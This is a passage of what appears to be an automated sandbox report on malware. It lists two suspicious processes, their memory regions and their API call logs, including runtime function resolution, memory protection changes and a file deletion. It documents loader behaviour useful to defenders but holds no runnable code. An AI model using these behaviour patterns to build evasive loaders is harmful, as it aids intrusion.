| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #10: hytmjoxhrtf.exe
36
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8a8 |
| Parent PID | 0x894 (c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
468
0x
8B4
0x
8D4
0x
8E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fdfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x00350fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| hytmjoxhrtf.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x005b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d70000 | 0x01d70000 | 0x02162fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02170000 | 0x0243efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002440000 | 0x02440000 | 0x0253ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74770000 | 0x74785fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747b0000 | 0x747c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747d0000 | 0x747dcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747e0000 | 0x747eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x468
35
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\hyTmJoXHrTF.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\hytmjoxhrtf.exe |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Mutex | Release | - |
|
1 | |
| System | Get Time | type = Ticks, time = 187747 |
|
1 |
Thread 0x8d4
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 188808 |
|
1 |
Process #11: 5kyzze.exe
28
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\5kyzzE.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8bc |
| Parent PID | 0x734 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00242fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| 5kyzze.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x00a30fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a40000 | 0x00a40000 | 0x01e3ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x01f4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001f50000 | 0x01f50000 | 0x02342fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02350000 | 0x0261efff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0x8b8
28
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75570000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\user32.dll, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\5kyzze.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18faec |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb34 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fba0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x74cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75570000 |
|
1 | |
